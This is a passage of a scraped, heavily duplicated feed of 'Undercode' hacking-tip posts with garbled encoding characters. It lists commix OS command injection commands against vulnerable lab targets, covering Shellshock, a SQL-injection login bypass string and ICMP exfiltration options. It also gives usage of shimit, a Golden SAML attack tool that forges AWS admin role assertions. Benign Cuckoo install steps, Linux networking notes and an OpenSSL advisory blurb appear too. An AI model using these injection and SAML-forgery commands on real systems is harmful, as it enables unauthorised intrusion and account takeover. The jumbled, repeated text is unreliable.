root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
13. Exploiting commix-testbed (JSON-based) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'
14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"
π¦ Tested by undercode on ubuntu
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 UPDATED Automated All-in-One OS command injection and exploitation tool.
fb.com/undercodeTesting
π¦SUPPORTED OS :
ArchStrike
BlackArch Linux
BackBox
Kali Linux
Parrot Security OS
Pentoo Linux
Weakerthan Linux
Mac OS X
Windows (experimental)
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/commixproject/commix.git
2) cd commix
3) python commix.py -h
π¦COMMANDS :
1. Exploiting Damn Vulnerable Web App:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"
3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"
4. Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
5. Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"
6. Exploiting Kioptrix: Level 1.1 (#2):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"
8. Exploiting CVE-2014-6271/Shellshock:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock
9. Exploiting commix-testbed (cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"
10. Exploiting commix-testbed (user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3
11. Exploiting commix-testbed (referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3
12. Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
13. Exploiting commix-testbed (JSON-based) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'
14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"
π¦ Tested by undercode on ubuntu
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 updated automated dynamic malware analysis system
pinterest.com/undercode_Testing
π¦πβπππΈπππππΈπππβ & βπβ :
1) $ sudo pip install -U pip setuptools
2) $ sudo pip install -U cuckoo
Although the above, a global installation of Cuckoo in your OS works mostly fine, we highly recommend installing Cuckoo in a virtualenv, which looks roughly as follows:
3) $ virtualenv venv
4) $ . venv/bin/activate
> (venv)$ pip install -U pip setuptools
> (venv)$ pip install -U cuckoo
5) for cloning > git clone https://github.com/cuckoosandbox/cuckoo.git
enjoy free malware analysis
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 updated automated dynamic malware analysis system
pinterest.com/undercode_Testing
π¦πβπππΈπππππΈπππβ & βπβ :
1) $ sudo pip install -U pip setuptools
2) $ sudo pip install -U cuckoo
Although the above, a global installation of Cuckoo in your OS works mostly fine, we highly recommend installing Cuckoo in a virtualenv, which looks roughly as follows:
3) $ virtualenv venv
4) $ . venv/bin/activate
> (venv)$ pip install -U pip setuptools
> (venv)$ pip install -U cuckoo
5) for cloning > git clone https://github.com/cuckoosandbox/cuckoo.git
enjoy free malware analysis
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Pinterest
UnderCode TESTING (UNDERCODE_TESTING) - Profile | Pinterest
UnderCode TESTING | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦A tool that implements the Golden SAML attack
instagram.com/undercodeTesting
π¦πβπππΈπππππΈπππβ & βπβ :
1) python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
2) git clone https://github.com/cyberark/shimit.git
3) cd shimit
4) python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust
pk - Private key file full path (pem format)
c - Certificate file full path (pem format)
u - User and domain name e.g. domain\username (use \ or quotes in *nix)
n - Session name in AWS
r - Desired roles in AWS. Supports Multiple roles, the first one specified will be assumed.
id - AWS account id e.g. 123456789012
Save SAMLResponse to file
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
o - Output encoded SAMLResponse to a specified file path
Load SAMLResponse from file
python .\shimit.py -l saml_response.xml
l - Load SAMLResponse from a specified file path
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦A tool that implements the Golden SAML attack
instagram.com/undercodeTesting
π¦πβπππΈπππππΈπππβ & βπβ :
1) python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
2) git clone https://github.com/cyberark/shimit.git
3) cd shimit
4) python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust
pk - Private key file full path (pem format)
c - Certificate file full path (pem format)
u - User and domain name e.g. domain\username (use \ or quotes in *nix)
n - Session name in AWS
r - Desired roles in AWS. Supports Multiple roles, the first one specified will be assumed.
id - AWS account id e.g. 123456789012
Save SAMLResponse to file
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
o - Output encoded SAMLResponse to a specified file path
Load SAMLResponse from file
python .\shimit.py -l saml_response.xml
l - Load SAMLResponse from a specified file path
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - cyberark/shimit: A tool that implements the Golden SAML attack
A tool that implements the Golden SAML attack. Contribute to cyberark/shimit development by creating an account on GitHub.
π¦after all those great tools let s send some programming tip by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Speed Optimization-Tuning Tools for Tuning Linux Network by undercode :
PerformanceLINUX network performance tuning of debugging tools
T..me/undercodeTesting
π¦ ππΌπ π πππΈβπ :
1) route
must specify the path for the machine to receive the data packet. In the Linux system, a command route is provided. This command can set a static route for the network card configured by the ifconfig command. This kind of setting work is usually introduced in /etc/rc.d/rc.inet1 and is carried out when the system boots.
2) We use several examples to illustrate how to use the route command:
> route add -net 127.0.0.0
3) This command will add a route to a specified address or network to the routing table. Note that the network is now a class A address and the mask is set to 255.0.0.0, and this newly added entry is connected to the lo device.
> route add -net xxx.xxx.xxx.xxx netmask 255.255.255.0 dev eth0
4) This command adds a route to the host with the IP address xxx.xxx.xxx.xxx, and its netmask is set to 255.255.255.0.
> route del -net xxx.xxx.xxx.xxx
5) This command will delete the route of the network xxx.xxx.xxx.xxx.
Using the route command can also easily manage the routing information of the entire network, and the output is the network routing table. As follows:
-------------------------------------------------- ---------------
π¦ [root @ lee / root] #route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
10.10.8.224 * 255.255.255.255 UH 0 0 0 eth0
10.10. 8.0 * 255.255.255.0 U 0 0 0 eth0
127.0.0.0 * 255.0.0.0 U 0 0 0 lo
default dgc8.njupt.edu 0.0.0.0 UG 0 0 0 eth0
default dgc8.njupt.edu 0.0.0.0 UG 1 0 0 eth0
[root @ lee / root] #
------------------------------------------ -----------------------
6) The meaning of each field in the output is:
Β· Destination indicates the destination IP address of the route.
Β· Gateway indicates the host name or IP address used by the gateway. The "*" output above indicates that there is no gateway.
Β· Genmask indicates the network mask of the route. Before comparing it with the destination address of the route, the kernel performs a bitwise AND operation with the Genmask and the IP address of the packet to set the route.
Β· Flags are flags that indicate routing. The available signs and their meanings are: U means that the route is starting, H means that the target is a host, G means to use the gateway, R means to reset the dynamic route; D means to dynamically install the route, and M means to modify the route! Reject routing.
Β· Metric indicates the unit cost of routing.
Β· Ref indicates the number of other routes that depend on the current status of the route.
Β· Use indicates the number of routing table entries used.
Β· Iface indicates the destination network for routing the sent packets.
π¦ By viewing these output information, we can easily manage the routing table of the network.
6) netstat The
netstat command is a very useful tool for monitoring TCP / IP networks. It can display routing tables, actual network connections, and status information for each network interface device. After executing netstat on the computer, the output is as follows:
------------------------------------ -----------------------------
[root @ lee / root] #netstat
Active Internet connections (w / o servers)
Proto Recv- Q Send-Q Local Address Foreign Address State
Active UNIX domain sockets (w / o servers)
Proto RefCnt Flags Types State I-Node Path
Unix 5 [] DGRAM 460 / dev / log
Unix 0 [] STREAM CONNECTED 173 @ 00000014
Unix 0 [] DGRAM 662
Unix 0 [] DGRAM 631
Unix 0 [] DGRAM 544
Unix 0 [] DGRAM 484
Unix 0 [] DGRAM 470
[root @ lee / root] #
--- -------------------------------------------------- ------------
π¦Speed Optimization-Tuning Tools for Tuning Linux Network by undercode :
PerformanceLINUX network performance tuning of debugging tools
T..me/undercodeTesting
π¦ ππΌπ π πππΈβπ :
1) route
must specify the path for the machine to receive the data packet. In the Linux system, a command route is provided. This command can set a static route for the network card configured by the ifconfig command. This kind of setting work is usually introduced in /etc/rc.d/rc.inet1 and is carried out when the system boots.
2) We use several examples to illustrate how to use the route command:
> route add -net 127.0.0.0
3) This command will add a route to a specified address or network to the routing table. Note that the network is now a class A address and the mask is set to 255.0.0.0, and this newly added entry is connected to the lo device.
> route add -net xxx.xxx.xxx.xxx netmask 255.255.255.0 dev eth0
4) This command adds a route to the host with the IP address xxx.xxx.xxx.xxx, and its netmask is set to 255.255.255.0.
> route del -net xxx.xxx.xxx.xxx
5) This command will delete the route of the network xxx.xxx.xxx.xxx.
Using the route command can also easily manage the routing information of the entire network, and the output is the network routing table. As follows:
-------------------------------------------------- ---------------
π¦ [root @ lee / root] #route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
10.10.8.224 * 255.255.255.255 UH 0 0 0 eth0
10.10. 8.0 * 255.255.255.0 U 0 0 0 eth0
127.0.0.0 * 255.0.0.0 U 0 0 0 lo
default dgc8.njupt.edu 0.0.0.0 UG 0 0 0 eth0
default dgc8.njupt.edu 0.0.0.0 UG 1 0 0 eth0
[root @ lee / root] #
------------------------------------------ -----------------------
6) The meaning of each field in the output is:
Β· Destination indicates the destination IP address of the route.
Β· Gateway indicates the host name or IP address used by the gateway. The "*" output above indicates that there is no gateway.
Β· Genmask indicates the network mask of the route. Before comparing it with the destination address of the route, the kernel performs a bitwise AND operation with the Genmask and the IP address of the packet to set the route.
Β· Flags are flags that indicate routing. The available signs and their meanings are: U means that the route is starting, H means that the target is a host, G means to use the gateway, R means to reset the dynamic route; D means to dynamically install the route, and M means to modify the route! Reject routing.
Β· Metric indicates the unit cost of routing.
Β· Ref indicates the number of other routes that depend on the current status of the route.
Β· Use indicates the number of routing table entries used.
Β· Iface indicates the destination network for routing the sent packets.
π¦ By viewing these output information, we can easily manage the routing table of the network.
6) netstat The
netstat command is a very useful tool for monitoring TCP / IP networks. It can display routing tables, actual network connections, and status information for each network interface device. After executing netstat on the computer, the output is as follows:
------------------------------------ -----------------------------
[root @ lee / root] #netstat
Active Internet connections (w / o servers)
Proto Recv- Q Send-Q Local Address Foreign Address State
Active UNIX domain sockets (w / o servers)
Proto RefCnt Flags Types State I-Node Path
Unix 5 [] DGRAM 460 / dev / log
Unix 0 [] STREAM CONNECTED 173 @ 00000014
Unix 0 [] DGRAM 662
Unix 0 [] DGRAM 631
Unix 0 [] DGRAM 544
Unix 0 [] DGRAM 484
Unix 0 [] DGRAM 470
[root @ lee / root] #
--- -------------------------------------------------- ------------
7) Overall, the output of netstat can be divided into two parts: The first part is Active Internet connections, called active TCP connections. In the output above, There is no content in this part, which means that there is no TCP connection yet. The second part: Active UNIX domain sockets, called active Unix domain sockets. The output shows the connection status of the Unix domain socket:
π¦ Proto displays the protocol used for the connection.
Β· RefCnt represents the process number connected to this socket.
Β· Types shows the type of socket.
Β· State displays the current state of the socket.
Β· Path represents the path name used by other processes connected to the socket.
8) You can use netstat -a to view the status of all sockets, which is very useful when you debug network programs. netstat -r will display the contents of the routing table, generally also specify the "-n" option at the same time, so that you can get the address in digital format, you can also display the IP address of the default router. Use netstat -i will display all network interface information. Using netstat can also get the current network status and network topology, which is very useful in practice.
9) tcpdump The
tcpdump command is used to monitor TCP / IP connections and directly read the packet header of the data link layer. You can specify which data packets are monitored and which controls are displayed in a format. For example, if we want to monitor all the communication on the Ethernet, execute the following command:
γγtcpdump -i eth0
10) Even on a relatively calm network, there are a lot of communication, so we may only need to get the information of those packets we are interested in . In general, the TCP / IP stack only binds incoming packets received by the local host while ignoring other computer addresses on the network (unless you are using a router). When running the tcpdump command, it will set the TCP / IP stack to promiscuous mode. This mode can receive all data packets and make them display effectively. If we are only concerned about communication cases, one method is to use our local hosts "-p" parameter prohibit promiscuous mode, there is a way to specify the hostname:
γ> γtcpdump -i eth0 Host hostname
10) At this point, the system will only be named The communication packets of hostname host are monitored. The host name can be the local host or any computer on the network. The following command can read all data sent by host hostname:
> tcpdump -i eth0 src host hostname
π¦ The following command can monitor all data packets sent to host hostname:
> tcpdump -i eth0 dst host hostname
11) We can also monitor packets passing through the specified gateway:
tcpdump -i eth0 gateway Gatewayname
12) If you also want to monitor TCP or UDP packets addressed to the specified port, then execute the following command:
tcpdump -i eth0 host hostname and port 80
13) This command will display the header from each packet and the addressing of port 80 from the hostname of the host. Port 80 is the system default HTTP service port number. If we only need to list the packets sent to port 80, use dst port; if we only want to see the packets returned to port 80, use src port.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Proto displays the protocol used for the connection.
Β· RefCnt represents the process number connected to this socket.
Β· Types shows the type of socket.
Β· State displays the current state of the socket.
Β· Path represents the path name used by other processes connected to the socket.
8) You can use netstat -a to view the status of all sockets, which is very useful when you debug network programs. netstat -r will display the contents of the routing table, generally also specify the "-n" option at the same time, so that you can get the address in digital format, you can also display the IP address of the default router. Use netstat -i will display all network interface information. Using netstat can also get the current network status and network topology, which is very useful in practice.
9) tcpdump The
tcpdump command is used to monitor TCP / IP connections and directly read the packet header of the data link layer. You can specify which data packets are monitored and which controls are displayed in a format. For example, if we want to monitor all the communication on the Ethernet, execute the following command:
γγtcpdump -i eth0
10) Even on a relatively calm network, there are a lot of communication, so we may only need to get the information of those packets we are interested in . In general, the TCP / IP stack only binds incoming packets received by the local host while ignoring other computer addresses on the network (unless you are using a router). When running the tcpdump command, it will set the TCP / IP stack to promiscuous mode. This mode can receive all data packets and make them display effectively. If we are only concerned about communication cases, one method is to use our local hosts "-p" parameter prohibit promiscuous mode, there is a way to specify the hostname:
γ> γtcpdump -i eth0 Host hostname
10) At this point, the system will only be named The communication packets of hostname host are monitored. The host name can be the local host or any computer on the network. The following command can read all data sent by host hostname:
> tcpdump -i eth0 src host hostname
π¦ The following command can monitor all data packets sent to host hostname:
> tcpdump -i eth0 dst host hostname
11) We can also monitor packets passing through the specified gateway:
tcpdump -i eth0 gateway Gatewayname
12) If you also want to monitor TCP or UDP packets addressed to the specified port, then execute the following command:
tcpdump -i eth0 host hostname and port 80
13) This command will display the header from each packet and the addressing of port 80 from the hostname of the host. Port 80 is the system default HTTP service port number. If we only need to list the packets sent to port 80, use dst port; if we only want to see the packets returned to port 80, use src port.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Full trick Speed Optimization-Tuning Tools for Tuning Linux Network by undercode :
PerformanceLINUX network performance tuning of debugging tools
E N J O Y
PerformanceLINUX network performance tuning of debugging tools
E N J O Y
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Hacker News by Undercode :
recently from undercode Tweets :
!!!!!!! OpenSSL exposes a high-risk vulnerability
> The OpenSSL project released a security bulletin that disclosed a high-risk vulnerability affecting OpenSSL v1.1.1d, 1.1.1e, and 1.1.1f.
> The vulnerability can be used to launch denial of service attacks.
> The developer claims that server or client applications that call the SSL_check_chain () function during or after the TLS 1.3 handshake may crash due to incorrect handling of null pointer references caused by the signature_algorithms_cert extension.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Hacker News by Undercode :
recently from undercode Tweets :
!!!!!!! OpenSSL exposes a high-risk vulnerability
> The OpenSSL project released a security bulletin that disclosed a high-risk vulnerability affecting OpenSSL v1.1.1d, 1.1.1e, and 1.1.1f.
> The vulnerability can be used to launch denial of service attacks.
> The developer claims that server or client applications that call the SSL_check_chain () function during or after the TLS 1.3 handshake may crash due to incorrect handling of null pointer references caused by the signature_algorithms_cert extension.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β